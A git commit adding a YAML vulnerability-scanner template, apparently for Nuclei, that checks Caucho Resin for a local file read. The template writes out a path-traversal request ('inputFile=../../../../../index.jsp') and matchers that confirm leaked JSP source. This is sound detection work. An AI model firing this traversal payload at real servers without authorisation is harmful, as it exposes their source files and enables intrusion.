Create resin-inputfile-fileread.yaml

patch-1
Prince Chaddha 2021-04-22 19:16:56 +05:30 committed by GitHub
parent 8faeadf432
commit 376e8ec590
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

View File

@ -0,0 +1,20 @@
id: resin-inputfile-fileread
info:
name: Caucho Resin LFR
author: princechaddha
severity: high
tags: resin,caucho,lfr
requests:
- method: GET
path:
- "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>"
part: body